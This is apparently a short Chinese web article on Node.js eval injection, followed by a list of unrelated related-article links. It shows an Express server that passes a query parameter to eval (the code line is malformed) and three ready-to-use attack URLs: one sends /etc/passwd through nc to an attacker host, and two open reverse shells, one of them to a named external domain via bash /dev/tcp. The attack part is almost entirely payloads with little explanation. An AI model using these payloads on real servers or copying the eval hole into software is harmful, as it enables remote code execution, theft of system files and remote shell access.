var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件讀取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

您可能感興趣的文章:

相關(guān)文章

Node Mongoose用法詳解【Mongoose使用、Schema、對象、model文檔等】
這篇文章主要介紹了Node Mongoose用法,結(jié)合實例形式分析了Mongoose使用、Schema、對象、model文檔等基本原理、用法及操作注意事項,需要的朋友可以參考下
2020-05-05
解決npm?i?報錯以及python安裝卡住的問題
這篇文章主要介紹了解決npm?i?報錯以及python安裝卡住的問題，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2022-10-10
nodeJs爬蟲的技術(shù)點總結(jié)
本篇文章給大家總結(jié)了關(guān)于nodeJs爬蟲的技術(shù)點的相關(guān)知識，對爬蟲有興趣的朋友可以跟著學(xué)習(xí)參考下。
2018-05-05
nodejs個人博客開發(fā)第四步數(shù)據(jù)模型
這篇文章主要為大家詳細(xì)介紹了nodejs個人博客開發(fā)的數(shù)據(jù)模型，具有一定的參考價值，感興趣的小伙伴們可以參考一下
2017-04-04
Node.js中child_process實現(xiàn)多進程
這篇文章主要介紹了Node.js中child_process實現(xiàn)多進程,需要的朋友可以參考下
2015-02-02
Node.js中使用事件發(fā)射器模式實現(xiàn)事件綁定詳解
這篇文章主要介紹了Node.js中使用事件發(fā)射器模式實現(xiàn)事件綁定詳解,本文一并講解了回調(diào)模式、發(fā)射器模式、事件類型等基礎(chǔ)知識做了補充,需要的朋友可以參考下
2014-08-08
利用yarn代替npm管理前端項目模塊依賴的方法詳解
這篇文章主要給大家介紹了關(guān)于利用yarn代替npm管理前端項目模塊依賴的相關(guān)資料，文中通過示例代碼介紹的非常詳細(xì)，對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值，需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧。
2017-09-09
Node配合WebSocket做多文件下載以及進度回傳
這篇文章主要介紹了Node配合WebSocket做多文件下載以及進度回傳功能，本文通過實例代碼效果截圖給大家介紹的非常詳細(xì),需要的朋友可以參考下
2019-11-11
詳解離線安裝npm包的幾種方法
這篇文章主要介紹了詳解離線安裝npm包的幾種方法，小編覺得挺不錯的，現(xiàn)在分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2018-11-11
node.js使用npm 安裝插件時提示install Error: ENOENT報錯的解決方法
這篇文章主要介紹了node.js使用npm 安裝插件時提示install Error: ENOENT報錯的解決方法,需要的朋友可以參考下
2014-11-11